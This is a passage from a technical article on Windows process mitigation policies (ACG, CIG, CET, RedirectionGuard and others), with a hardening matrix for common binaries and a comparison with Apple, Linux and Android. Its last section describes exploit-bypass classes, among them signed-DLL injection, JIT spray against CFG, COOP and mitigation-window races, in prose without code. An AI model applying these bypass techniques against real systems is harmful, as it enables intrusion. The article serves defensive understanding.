&lt;h3&gt;&lt;code&gt;ProcessExtensionPointDisablePolicy&lt;/code&gt;&lt;/h3&gt;
&lt;p&gt;Disables legacy extension-point classes that have historically been DLL-injection vectors: &lt;code&gt;AppInit_DLLs&lt;/code&gt; (registry-driven inject-into-everything), IME modules, Layered Service Providers (LSP, the Winsock provider chain), &lt;code&gt;WinEventHook&lt;/code&gt;/&lt;code&gt;SetWindowsHookEx&lt;/code&gt; global hooks. Enabling the policy makes the loader refuse to map any DLL through these legacy paths into the process [@ms-setprocessmitigationpolicy, @ms-process-mitigation-enum]. This is one of the lowest-cost mitigations to enable for any process that does not knowingly need legacy IME or LSP integration.&lt;/p&gt;
&lt;h3&gt;&lt;code&gt;ProcessFontDisablePolicy&lt;/code&gt;&lt;/h3&gt;
&lt;p&gt;Refuses non-system fonts. The historical motivation was a 2015 wave of ATMFD.DLL kernel-font-parser CVEs (the Adobe Type Manager font driver). Microsoft moved the font parser out of the kernel into user mode after that wave, and this per-process policy then refuses non-system fonts entirely for browser-class sandboxed processes that do not need them [@ms-setprocessmitigationpolicy].&lt;/p&gt;
&lt;h3&gt;&lt;code&gt;ProcessImageLoadPolicy&lt;/code&gt;&lt;/h3&gt;
&lt;p&gt;Three loader-time flags, all about &lt;em&gt;where&lt;/em&gt; a DLL can come from:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;NoRemoteImages&lt;/code&gt; -- block DLLs whose path is a UNC &lt;code&gt;\\server\share\dll&lt;/code&gt;. Eliminates a remote-DLL family that crossed administrative boundaries.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;NoLowMandatoryLabelImages&lt;/code&gt; -- block DLLs whose file was written by a low-integrity-label process. A compromised sandboxed process could write a DLL to disk; this flag stops a peer broker from picking that DLL up.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;PreferSystem32Images&lt;/code&gt; -- search &lt;code&gt;\Windows\System32\&lt;/code&gt; before the application directory in the DLL search order. Closes the DLL-search-order-hijack class, a very old attack surface.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;All three are in [@ms-image-load-policy]. Together they collapse the DLL-loading attack surface to a small, well-controlled set of code paths.&lt;/p&gt;
&lt;h3&gt;&lt;code&gt;ProcessStrictHandleCheckPolicy&lt;/code&gt;&lt;/h3&gt;
&lt;p&gt;Causes the process to fault immediately on any use of an invalid handle (use-after-close, double-close, opaque-mismatch) [@ms-setprocessmitigationpolicy]. Handle bugs are an obscure but exploitable class -- a freed kernel object&apos;s handle can be reissued, and a process that does not detect this can be tricked into operating on an attacker-controlled replacement. Strict handle checking turns a subtle handle-confusion bug into an immediate crash, before the attacker can pivot.&lt;/p&gt;
&lt;h3&gt;&lt;code&gt;ProcessRedirectionTrustPolicy&lt;/code&gt; -- RedirectionGuard&lt;/h3&gt;
&lt;p&gt;Mitigates symbolic-link, junction, and mount-point confused-deputy attacks. James Forshaw documented the attack family at Project Zero starting in August 2015 with the Windows 10 symbolic-link mitigations post [@p0-forshaw-symlink-2015]. Microsoft shipped the per-process mitigation a decade later, in June 2025 [@msrc-redirectionguard]. RedirectionGuard refuses to traverse a junction if the junction&apos;s target was created by a less-trusted user than the process performing the open -- closing the &quot;a low-IL caller plants a junction; a high-IL service follows it&quot; pattern that has been a steady source of local privilege escalation since at least Windows Vista.RedirectionGuard&apos;s June 2025 ship date makes it the freshest entry in the &lt;code&gt;PROCESS_MITIGATION_POLICY&lt;/code&gt; enum. The MSRC blog states the structural framing in one sentence: &quot;Junctions remain the biggest existing gap. Outside of a sandbox, they can be created by standard users and target any folder on the system&quot; [@msrc-redirectionguard].&lt;/p&gt;
&lt;h3&gt;&lt;code&gt;ProcessSideChannelIsolationPolicy&lt;/code&gt;&lt;/h3&gt;
&lt;p&gt;The policy exposes five fields [@ms-setprocessmitigationpolicy]:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;IsolateSecurityDomain&lt;/code&gt; -- on context switch, issue &lt;code&gt;IBPB&lt;/code&gt; (Indirect Branch Predictor Barrier) and &lt;code&gt;STIBP&lt;/code&gt; (Single Thread Indirect Branch Prediction) flushes. This is the per-process Spectre v2 / MDS side-channel mitigation. Performance cost is real, in the 2-5% range on indirect-branch-heavy workloads, and is the reason this policy is opt-in rather than default.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;DisablePageCombining&lt;/code&gt; -- prevents the kernel from merging identical physical pages across processes. Page-combining is a memory-saving feature that creates a cross-process side-channel: timing the cost of a write to a shared, copy-on-write page leaks whether the page was previously merged with another process&apos;s identical page.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;code&gt;ProcessUserShadowStackPolicy&lt;/code&gt;&lt;/h3&gt;
&lt;p&gt;The CET-on switch from section 6 [@ms-user-shadow-stack-policy]. Listed here for enum completeness.&lt;/p&gt;
&lt;h3&gt;&lt;code&gt;ProcessChildProcessPolicy&lt;/code&gt;&lt;/h3&gt;
&lt;p&gt;Refuses any &lt;code&gt;CreateProcess&lt;/code&gt; call originating from the process [@ms-setprocessmitigationpolicy]. Edge content processes and Chromium renderers enable this. The structural attack class it closes is &quot;renderer is compromised; renderer spawns &lt;code&gt;cmd.exe&lt;/code&gt; or &lt;code&gt;powershell.exe&lt;/code&gt; and the attacker pivots to a non-sandboxed cousin.&quot; With &lt;code&gt;ProcessChildProcessPolicy&lt;/code&gt; on, the renderer cannot spawn anything; the attacker has to either bypass within the sandbox or attack the broker process.&lt;/p&gt;
&lt;h3&gt;&lt;code&gt;ProcessPayloadRestrictionPolicy&lt;/code&gt; -- EAF / IAF / ROP checks&lt;/h3&gt;
&lt;p&gt;The mitigations that EMET originally bundled, carried forward into Windows Defender Exploit Guard [@ms-defender-exploit-protection]: Export Address Filter (EAF), Import Address Filter (IAF), ROP-Stack-Pivot, ROP-Caller-Check, ROP-Sim-Exec. Five sub-mitigations that detect heuristic exploit patterns. The honest assessment: these are defense-in-depth against legacy 32-bit binaries that cannot be recompiled with CFG, XFG, or CET. On modern x64 binaries built with &lt;code&gt;/guard:cf /CETCOMPAT&lt;/code&gt;, the payload-restriction checks are largely redundant. They remain useful as a backstop for unrecompilable third-party code that runs in a hardened parent process.&lt;/p&gt;
&lt;h3&gt;&lt;code&gt;ProcessASLRPolicy&lt;/code&gt; and &lt;code&gt;ProcessDEPPolicy&lt;/code&gt;&lt;/h3&gt;
&lt;p&gt;The per-process knobs on top of the system-wide foundations [@ms-setprocessmitigationpolicy]. &lt;code&gt;ProcessASLRPolicy&lt;/code&gt; exposes &lt;code&gt;BottomUpRandomization&lt;/code&gt;, &lt;code&gt;HighEntropy&lt;/code&gt;, &lt;code&gt;ForceRelocateImages&lt;/code&gt;, and other refinements -- useful for forcing a paranoid configuration on processes that load third-party DLLs without &lt;code&gt;/DYNAMICBASE&lt;/code&gt;. &lt;code&gt;ProcessDEPPolicy&lt;/code&gt; is a 32-bit-only vestigial knob; on x64 it does nothing because DEP is unconditionally on.&lt;/p&gt;
&lt;h3&gt;The other policies&lt;/h3&gt;
&lt;p&gt;&lt;code&gt;ProcessActivationContextTrustPolicy&lt;/code&gt; (restricts manifest-driven activation contexts), &lt;code&gt;ProcessMitigationOptionsMask&lt;/code&gt; (a meta-policy returning the mask of supported bits), &lt;code&gt;ProcessSystemCallFilterPolicy&lt;/code&gt; (per-process syscall allowlist; rare in production), &lt;code&gt;ProcessUserPointerAuthPolicy&lt;/code&gt; (the ARM64-Windows switch for ARM Pointer Authentication, comparatively discussed in section 11), and &lt;code&gt;ProcessSEHOPPolicy&lt;/code&gt; (the per-process Structured Exception Handling Overwrite Protection knob -- a Vista-era mitigation predating the modern enum) fill out the enum to twenty-one values. None are individually load-bearing for the article&apos;s narrative; they exist for completeness of the kernel ABI.&lt;/p&gt;
&lt;p&gt;Twenty policies plus a sentinel. The canonical six handle the control-flow primitives. The other fourteen handle adjacent surfaces. What does it look like when all of these are turned on at once, and which binaries actually do that?&lt;/p&gt;
&lt;h2&gt;10. What does a maximally hardened modern Windows process look like?&lt;/h2&gt;
&lt;p&gt;It is one thing to enumerate policies. It is another to ask: who actually turns them on? Where does Microsoft itself enable each one, and what is the structural reason it cannot be enabled on the others?&lt;/p&gt;
&lt;p&gt;The fastest way to answer that question is a single matrix. Each column is a binary; each row is a &lt;code&gt;PROCESS_MITIGATION_POLICY&lt;/code&gt; value. Each cell is either &lt;em&gt;enabled&lt;/em&gt;, or the structural reason it cannot be. The matrix below summarizes the typical &lt;code&gt;Get-ProcessMitigation&lt;/code&gt; output for representative binaries, with structural-can&apos;t reasons drawn from public Microsoft documentation, Matt Miller&apos;s Edge mitigation blog [@miller-acg-blog], and the policy-enum reference [@ms-process-mitigation-enum, @ms-setprocessmitigationpolicy].&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Policy&lt;/th&gt;
&lt;th&gt;Edge content (&lt;code&gt;MicrosoftEdgeCP.exe&lt;/code&gt;)&lt;/th&gt;
&lt;th&gt;Chrome renderer&lt;/th&gt;
&lt;th&gt;Outlook (Office)&lt;/th&gt;
&lt;th&gt;Defender (&lt;code&gt;MsMpEng.exe&lt;/code&gt;)&lt;/th&gt;
&lt;th&gt;Recall (Windows AI service)&lt;/th&gt;
&lt;th&gt;&lt;code&gt;Notepad.exe&lt;/code&gt;&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;DEP / ASLR (system foundation)&lt;/td&gt;
&lt;td&gt;yes&lt;/td&gt;
&lt;td&gt;yes&lt;/td&gt;
&lt;td&gt;yes&lt;/td&gt;
&lt;td&gt;yes&lt;/td&gt;
&lt;td&gt;yes&lt;/td&gt;
&lt;td&gt;yes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;CFG&lt;/td&gt;
&lt;td&gt;yes&lt;/td&gt;
&lt;td&gt;yes&lt;/td&gt;
&lt;td&gt;yes&lt;/td&gt;
&lt;td&gt;yes&lt;/td&gt;
&lt;td&gt;yes&lt;/td&gt;
&lt;td&gt;yes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;CET shadow stack&lt;/td&gt;
&lt;td&gt;yes (strict)&lt;/td&gt;
&lt;td&gt;yes&lt;/td&gt;
&lt;td&gt;partial&lt;/td&gt;
&lt;td&gt;yes&lt;/td&gt;
&lt;td&gt;yes (strict)&lt;/td&gt;
&lt;td&gt;yes (default)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;ACG (&lt;code&gt;ProcessDynamicCodePolicy&lt;/code&gt;)&lt;/td&gt;
&lt;td&gt;yes&lt;/td&gt;
&lt;td&gt;yes (with OOP JIT)&lt;/td&gt;
&lt;td&gt;no -- COM/MAPI add-ins&lt;/td&gt;
&lt;td&gt;no -- engine generates scanner code at runtime&lt;/td&gt;
&lt;td&gt;yes&lt;/td&gt;
&lt;td&gt;n/a (no JIT)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;CIG (&lt;code&gt;ProcessSignaturePolicy&lt;/code&gt;)&lt;/td&gt;
&lt;td&gt;yes (&lt;code&gt;MicrosoftSignedOnly&lt;/code&gt;)&lt;/td&gt;
&lt;td&gt;partial -- plugins&lt;/td&gt;
&lt;td&gt;no -- third-party add-ins&lt;/td&gt;
&lt;td&gt;yes&lt;/td&gt;
&lt;td&gt;yes (&lt;code&gt;MicrosoftSignedOnly&lt;/code&gt;)&lt;/td&gt;
&lt;td&gt;n/a&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Disable-Win32k (&lt;code&gt;SystemCallDisable&lt;/code&gt;)&lt;/td&gt;
&lt;td&gt;yes&lt;/td&gt;
&lt;td&gt;yes (renderer process)&lt;/td&gt;
&lt;td&gt;n/a (GUI)&lt;/td&gt;
&lt;td&gt;yes (no GUI)&lt;/td&gt;
&lt;td&gt;yes (no GUI)&lt;/td&gt;
&lt;td&gt;n/a (GUI)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Disable-Extension-Points&lt;/td&gt;
&lt;td&gt;yes&lt;/td&gt;
&lt;td&gt;yes&lt;/td&gt;
&lt;td&gt;partial&lt;/td&gt;
&lt;td&gt;yes&lt;/td&gt;
&lt;td&gt;yes&lt;/td&gt;
&lt;td&gt;default&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Image-Load (all three flags)&lt;/td&gt;
&lt;td&gt;yes&lt;/td&gt;
&lt;td&gt;yes&lt;/td&gt;
&lt;td&gt;partial&lt;/td&gt;
&lt;td&gt;yes&lt;/td&gt;
&lt;td&gt;yes&lt;/td&gt;
&lt;td&gt;default&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;StrictHandleCheck&lt;/td&gt;
&lt;td&gt;yes&lt;/td&gt;
&lt;td&gt;yes&lt;/td&gt;
&lt;td&gt;yes&lt;/td&gt;
&lt;td&gt;yes&lt;/td&gt;
&lt;td&gt;yes&lt;/td&gt;
&lt;td&gt;yes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;ChildProcess&lt;/td&gt;
&lt;td&gt;yes&lt;/td&gt;
&lt;td&gt;yes&lt;/td&gt;
&lt;td&gt;no -- launches &lt;code&gt;winword&lt;/code&gt;, etc.&lt;/td&gt;
&lt;td&gt;yes (no children)&lt;/td&gt;
&lt;td&gt;yes (no children)&lt;/td&gt;
&lt;td&gt;no&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;FontDisable&lt;/td&gt;
&lt;td&gt;yes&lt;/td&gt;
&lt;td&gt;yes&lt;/td&gt;
&lt;td&gt;n/a (renders fonts)&lt;/td&gt;
&lt;td&gt;n/a&lt;/td&gt;
&lt;td&gt;n/a&lt;/td&gt;
&lt;td&gt;n/a&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;RedirectionGuard&lt;/td&gt;
&lt;td&gt;yes (since 2025)&lt;/td&gt;
&lt;td&gt;yes (since 2025)&lt;/td&gt;
&lt;td&gt;partial&lt;/td&gt;
&lt;td&gt;yes&lt;/td&gt;
&lt;td&gt;yes&lt;/td&gt;
&lt;td&gt;partial&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;SideChannelIsolation&lt;/td&gt;
&lt;td&gt;optional&lt;/td&gt;
&lt;td&gt;optional&lt;/td&gt;
&lt;td&gt;optional&lt;/td&gt;
&lt;td&gt;optional&lt;/td&gt;
&lt;td&gt;yes (high-trust)&lt;/td&gt;
&lt;td&gt;optional&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;PayloadRestriction (EAF/IAF/ROP)&lt;/td&gt;
&lt;td&gt;yes&lt;/td&gt;
&lt;td&gt;yes&lt;/td&gt;
&lt;td&gt;yes&lt;/td&gt;
&lt;td&gt;yes&lt;/td&gt;
&lt;td&gt;yes&lt;/td&gt;
&lt;td&gt;n/a&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;The pattern that emerges from this matrix is the article&apos;s most important practical observation. The matrix is &lt;em&gt;a threat-model artefact&lt;/em&gt;.&lt;/p&gt;
&lt;p&gt;For any sandboxed-parser design -- a renderer, a font rasterizer, a PDF previewer, an image decoder -- the structurally-correct policy set is the union of what Edge and Recall enable. Both binaries parse untrusted content from the internet or from local files; both run in isolation; neither needs to load third-party signed DLLs, draw windows, or launch child processes. They can enable the full canonical recipe.&lt;/p&gt;
&lt;p&gt;For any extensibility-by-design surface, the policy set is smaller and the threat model has to absorb the gap. Outlook cannot enable CIG because the MAPI plugin model and third-party COM add-ins are an existential product feature. Outlook cannot enable &lt;code&gt;ChildProcess&lt;/code&gt; because it launches Word to open attachments. Defender cannot enable ACG because the scanner engine generates emulator bytecode, signature-compilation routines, and regex JITs at runtime -- it is, by design, a JIT for AV signatures, and that JIT runs in &lt;code&gt;MsMpEng.exe&lt;/code&gt;. Chromium cannot enable CIG by default because of the third-party plugin model (Widevine, native messaging hosts, accessibility integrations).&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; The canonical 2026 hardened-process recipe is CFG plus CET shadow stack plus ACG plus CIG plus Disable-Win32k plus Disable-Extension-Points plus Image-Load (all three flags) plus StrictHandleCheck plus ChildProcess plus, for parsers, FontDisable, plus RedirectionGuard for filesystem-interacting binaries. Every binary that misses one of these does so for a documentable structural reason -- which is exactly the threat-model artefact the matrix above produces.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;This is the recipe the &lt;em&gt;VBS and Trustlets&lt;/em&gt; sibling article in this series calls &quot;user-mode hardened.&quot; The VBS-isolated Trustlets in the Secure Kernel layer have a separate, complementary surface; see that article for the kernel-side parallel.&lt;/p&gt;
&lt;p&gt;Stacking the recipe is the best a 2026 user-mode process can be. But the attacker is still in the room. What survives even a fully-stacked process? What are the bypasses that work after every mitigation is on? Section 12 answers that. First, a quick comparison: what other operating systems do, and what they do differently.&lt;/p&gt;
&lt;h2&gt;11. What other operating systems do that Windows doesn&apos;t&lt;/h2&gt;
&lt;p&gt;Microsoft is not the only vendor with a per-process mitigation surface. Apple, Linux distributions, Chromium, and ARM-the-vendor are all in the same business, and they have made different structural choices. The honest comparison surfaces where Windows is ahead, where it is behind, and where the gap is not really a gap because the platforms solve slightly different problems.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Apple: Hardened Runtime, ARM PAC, and JIT entitlement.&lt;/strong&gt; Apple shipped Pointer Authentication Codes (PAC) on the A12 (iPhone XS, September 2018) and on every Mac M1 onward. PAC signs a code pointer with a per-process cryptographic key held in privileged hardware registers, storing the signature in the unused upper bits of a 64-bit pointer. The ARM &lt;code&gt;PACIA&lt;/code&gt;, &lt;code&gt;AUTIA&lt;/code&gt;, &lt;code&gt;PACIB&lt;/code&gt;, and &lt;code&gt;AUTIB&lt;/code&gt; instructions sign and verify [@wiki-armv83a]; an unsigned or wrongly-signed pointer dereferenced through a &lt;code&gt;BR&lt;/code&gt;/&lt;code&gt;BLR&lt;/code&gt; instruction with the AUT variant faults. PAC is &lt;em&gt;structurally stronger&lt;/em&gt; than CFG/XFG/CET because the key is held in privileged state and is unforgeable from user mode -- there is no bitmap to lift the validation through.&lt;/p&gt;
&lt;p&gt;Apple&apos;s JIT entitlement (&lt;code&gt;com.apple.security.cs.allow-jit&lt;/code&gt;) is a stronger architectural answer than ACG [@apple-hardened-runtime]. Code that wants to JIT must declare it at build time and is granted a specific in-process W^X carve-out &lt;em&gt;only if&lt;/em&gt; the entitlement is signed into the binary&apos;s code signature. The result: JIT capability is an attribute of the &lt;em&gt;signed binary&lt;/em&gt; rather than a runtime API call, which closes the race-the-mitigation-window class structurally rather than by API migration (&lt;code&gt;UpdateProcThreadAttribute&lt;/code&gt;).&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Linux: SELinux, landlock, LLVM &lt;code&gt;-fsanitize=kcfi&lt;/code&gt;, LLVM &lt;code&gt;-fsanitize=cfi-icall&lt;/code&gt;.&lt;/strong&gt; Forward-edge CFI in the Linux kernel first arrived in version 5.13 (June 2021) as an LTO-based jump-table implementation; the second-generation &lt;code&gt;-fsanitize=kcfi&lt;/code&gt; scheme, which places a 32-bit type hash immediately before each function entry and does not require link-time optimization, replaced it in 6.1 (December 2022) [@lwn-corbet-kcfi]. The kCFI design is conceptually very close to XFG, but cheap enough to deploy on a kernel build because it sheds the LTO requirement. LLVM&apos;s user-mode &lt;code&gt;-fsanitize=cfi-icall&lt;/code&gt; provides per-prototype CFI via jump-table dispatch but still requires LTO [@clang-cfi-doc]. SELinux operates at a different layer of the stack (mandatory access control on filesystem and IPC resources) and is not directly comparable to a control-flow defense -- it constrains &lt;em&gt;what the process can do&lt;/em&gt; rather than &lt;em&gt;what control flows the process can follow&lt;/em&gt;.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Chromium / V8 sandbox.&lt;/strong&gt; Chrome enables CFG on Windows, leans on ARM PAC on macOS, and is layering the V8 sandbox on top of all of them [@v8-sandbox-blog]. The V8 sandbox is a Chrome-side software defense: it confines a compromised renderer to a specific bounded memory range, so a renderer-process compromise cannot synthesize pointers to arbitrary out-of-sandbox memory. The V8 sandbox sits inside the renderer (different from the OOP-JIT trust boundary above it) and aims to make even a fully-compromised JIT-output bug non-fatal at the system level.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Android: Scudo allocator and ARM Memory Tagging Extension (MTE).&lt;/strong&gt; MTE attaches a 4-bit tag to every 16-byte allocation [@arm-mte-newsroom]. The CPU enforces the tag on every pointer dereference: tag mismatch raises a synchronous exception. Pixel 8 (October 2023) was the first consumer device with MTE-default-on for the kernel and key system services [@arm-mte-newsroom]. MTE catches the &lt;em&gt;cause&lt;/em&gt; (use-after-free, linear overflow into the next allocation) rather than the &lt;em&gt;symptom&lt;/em&gt; (control-flow hijack). It is conceptually orthogonal to CFI. The hard part is perf cost on memory-tagged loads, meaningful enough that even Apple has not enabled MTE on iOS as of 2026.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Platform&lt;/th&gt;
&lt;th&gt;Forward-edge&lt;/th&gt;
&lt;th&gt;Backward-edge&lt;/th&gt;
&lt;th&gt;Dynamic code&lt;/th&gt;
&lt;th&gt;Memory safety&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Windows (x64)&lt;/td&gt;
&lt;td&gt;CFG (coarse), XFG (deprecated)&lt;/td&gt;
&lt;td&gt;CET shadow stack&lt;/td&gt;
&lt;td&gt;ACG&lt;/td&gt;
&lt;td&gt;none structural&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Apple (ARM64)&lt;/td&gt;
&lt;td&gt;PAC (cryptographic, per-process key)&lt;/td&gt;
&lt;td&gt;PAC (signs return addresses too)&lt;/td&gt;
&lt;td&gt;JIT entitlement (declarative)&lt;/td&gt;
&lt;td&gt;none structural&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Linux kernel&lt;/td&gt;
&lt;td&gt;&lt;code&gt;-fsanitize=kcfi&lt;/code&gt; (LLVM 6.1+)&lt;/td&gt;
&lt;td&gt;shadow stack on x86 CET; PAC-RA on ARM&lt;/td&gt;
&lt;td&gt;not a kernel issue&lt;/td&gt;
&lt;td&gt;Rust-in-kernel pilot&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Android&lt;/td&gt;
&lt;td&gt;PAC + BTI on supported SoCs&lt;/td&gt;
&lt;td&gt;BTI / shadow call stack&lt;/td&gt;
&lt;td&gt;sandboxed by selinux + seccomp&lt;/td&gt;
&lt;td&gt;MTE on Pixel 8&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Chromium&lt;/td&gt;
&lt;td&gt;per-platform forward-edge&lt;/td&gt;
&lt;td&gt;per-platform backward-edge&lt;/td&gt;
&lt;td&gt;V8 sandbox (in-process)&lt;/td&gt;
&lt;td&gt;layered&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;The honest accounting:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;ARM PAC plus MTE is structurally stronger than CFG plus CET, because the cryptographic key (PAC) and the tag (MTE) are CPU-enforced state that no user-mode primitive can forge.&lt;/li&gt;
&lt;li&gt;Apple&apos;s JIT entitlement is a stronger architectural answer than ACG because it is declarative at signing time rather than imperative at process startup.&lt;/li&gt;
&lt;li&gt;SELinux/landlock is at a different layer (data access control) and is not directly comparable -- it solves a different problem.&lt;/li&gt;
&lt;li&gt;Windows&apos;s mitigation surface is the &lt;em&gt;most extensively deployed and most frequently extended&lt;/em&gt; per-process surface in industry use, by a wide margin. Twenty actual policies is more than any other vendor exposes to applications, and the API is stable, documented, and ABI-compatible across Windows versions back to Windows 8.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;MTE catches what CFI cannot. A use-after-free that produces a controllable write -- but never violates the control-flow graph -- is invisible to CFG, XFG, CET, and PAC, but raises an MTE tag-mismatch fault on the very first attacker-controlled dereference. This is the structural reason memory-tagging is the emerging frontier and the structural reason a Windows-on-ARM-with-MTE future would close attack classes the current per-process surface cannot reach.&lt;/p&gt;
&lt;p&gt;Stronger primitives exist on competing platforms. But Microsoft&apos;s per-process surface is the most extensively-deployed and most-frequently-extended in industry use. The &lt;em&gt;bypasses&lt;/em&gt; are what tell us where the surface still leaks.&lt;/p&gt;
&lt;h2&gt;12. How attackers respond to a fully hardened process&lt;/h2&gt;
&lt;p&gt;Every generation of Windows mitigation has shipped with a named bypass within a year of its release. Here is the tradition, one named class per defensive generation.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Signed-DLL injection.&lt;/strong&gt; Predates CIG. Find a Microsoft-signed DLL with a controllable side effect -- a DLL-search-order hijack against a signed Windows component, an Authenticode-padding write (CVE-2013-3900 family), or a signed driver with a known IOCTL privilege primitive. CIG sees a valid Microsoft signature and lets the DLL load. The mitigation is reactive: Microsoft&apos;s App Control / WDAC blocklist and the Driver Block List enumerate hundreds of banned-but-signed binaries; the list grows every quarter; the attacker&apos;s job is to find one not yet on it. This is one of the unsolved problems section 14 names.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;JIT spray as a CFG bypass (Theori, 2016).&lt;/strong&gt; The canonical writeup is Theori&apos;s &lt;em&gt;Chakra JIT CFG Bypass&lt;/em&gt; [@theori-chakra-cfg-bypass]. The page itself states verbatim that the bypass targeted Microsoft Security Bulletin MS16-119 (October 2016) -- a Chakra fix that tightened the JIT&apos;s emit pattern. The technique: persuade the Chakra JIT to emit attacker-chosen byte sequences inside JIT-allocated code pages, at addresses the attacker has marked as valid CFG targets via the &lt;code&gt;SetProcessValidCallTargets&lt;/code&gt; carve-out. The MS16-119 patch shrank the set of byte sequences a JavaScript program could induce the JIT to emit, but did not eliminate the technique structurally -- the structural fix was ACG (move the JIT out of process), section 8.&lt;/p&gt;

An exploitation technique in which an attacker writes JavaScript (or another JIT-targeted language) that causes the runtime JIT compiler to emit a long sequence of executable bytes at predictable addresses, where some of those emitted bytes form a useful gadget chain when reinterpreted at an offset. The classic JIT spray (Dion Blazakis, BHDC 2010) used Adobe Flash&apos;s ActionScript JIT. The 2016 Theori work generalised the idea to use the JIT to emit *CFG-valid* function-entry bytes [@theori-chakra-cfg-bypass].
&lt;p&gt;&lt;strong&gt;COOP -- code-reuse without a single CFG-invalid call.&lt;/strong&gt; Discussed in section 5; recapped here as the &lt;em&gt;first&lt;/em&gt; bypass class against coarse-grained forward-edge CFI [@coop-ieeesecurity-pdf]. The structural fix is fine-grained CFI: XFG, which Microsoft did not enforce by default and has since deprecated; LLVM&apos;s &lt;code&gt;-fsanitize=cfi-icall&lt;/code&gt; and &lt;code&gt;-fsanitize=kcfi&lt;/code&gt;; ARM PAC. The per-prototype hash check that XFG would have provided is exactly the property that closes COOP.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Race-the-mitigation-window (Forshaw + Fratric, 2017).&lt;/strong&gt; Discussed in section 8; recapped here. The structural fix is &lt;code&gt;UpdateProcThreadAttribute(PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY)&lt;/code&gt;, which installs mitigation policies &lt;em&gt;by the kernel&lt;/em&gt; at &lt;code&gt;CreateProcess&lt;/code&gt; time, before any user-mode code in the child runs. The race window between &lt;code&gt;CreateProcess&lt;/code&gt; return and the child&apos;s &lt;code&gt;SetProcessMitigationPolicy&lt;/code&gt; call is structurally closed. Documented in the Project Zero issue [@p0-issue-42450607] and the Exploit-DB mirror [@exploit-db-44467].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;The CET-bypass research direction (McGarr, 2025).&lt;/strong&gt; Connor McGarr&apos;s Black Hat USA 2025 deck &lt;em&gt;Out of Control&lt;/em&gt; names the live research front: kCFG and kCET in the Windows kernel [@mcgarr-bhusa25]. The deck enumerates bypass classes that survive both kernel-mode CFG and kernel-mode CET: page-table modification of the kCFG bitmap (requires kernel write primitives the attacker may already have), abuse of unprotected global function-pointer arrays, structural limits of CET when the attacker is operating with kernel privileges in the first place. The user-mode mitigation surface is mature; the kernel-mode surface is where the live work happens. Hypervisor-Protected Code Integrity (HVCI) is what makes kCFG bitmap mutations harder -- the bitmap is in VTL1, and a VTL0 kernel write cannot touch it -- which is the cross-link to the VBS/Trustlets sibling article in this series.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Cross-context PAC oracles (Apple).&lt;/strong&gt; Listed for comparative completeness. PAC&apos;s per-process key is forgeable if an attacker can call into a function that signs an attacker-controlled pointer with the per-process key and then read the result. This is a known research class on Apple platforms and has produced several CVEs against Safari and iOS over the past five years.&lt;/p&gt;

flowchart LR
    A[1996 stack smashing] --&amp;gt;|defended by| B[2004 DEP/NX]
    B --&amp;gt;|bypassed by| C[2007 ROP]
    C --&amp;gt;|defended by| D[2014 CFG]
    D --&amp;gt;|bypassed by| E[2015 COOP]
    D --&amp;gt;|bypassed by| F[2016 Theori&lt;br /&gt;JIT spray as&lt;br /&gt;CFG bypass]
    F --&amp;gt;|defended by| G[2017 ACG]
    G --&amp;gt;|bypassed by| H[2017 Forshaw&lt;br /&gt;Fratric race]
    H --&amp;gt;|defended by| I[UpdateProc-&lt;br /&gt;ThreadAttribute]
    G --&amp;gt;|defended by| J[2020 CET&lt;br /&gt;shadow stack]
